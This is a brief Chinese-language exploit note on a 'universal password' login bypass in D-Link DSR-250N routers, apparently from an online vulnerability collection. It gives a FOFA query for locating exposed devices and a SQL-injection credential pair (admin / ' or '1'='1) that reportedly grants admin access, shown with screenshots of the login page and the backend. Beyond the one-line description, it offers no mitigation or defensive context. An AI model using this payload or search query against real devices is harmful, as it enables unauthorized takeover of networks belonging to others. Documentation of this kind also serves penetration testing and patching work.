# D-Link DSR-250N 万能密码漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

D-Link DSR-250N 存在万能密码漏洞，攻击者通过漏洞可以获取后台权限

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

D-Link DSR-250N

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

app="D\_Link-DSR-250N"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr1yXucq3rj2HZuLQs%2Fimage.png?alt=media\&token=fd95c972-9a6e-4e16-bde9-8c1bc0a0194c)

```
user: admin
pass: ' or '1'='1
```

成功登录后台<br>

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr21chUMgG54d_yKjY%2Fimage.png?alt=media\&token=6da92cd0-8ef1-4158-a5db-e075ff1dda36)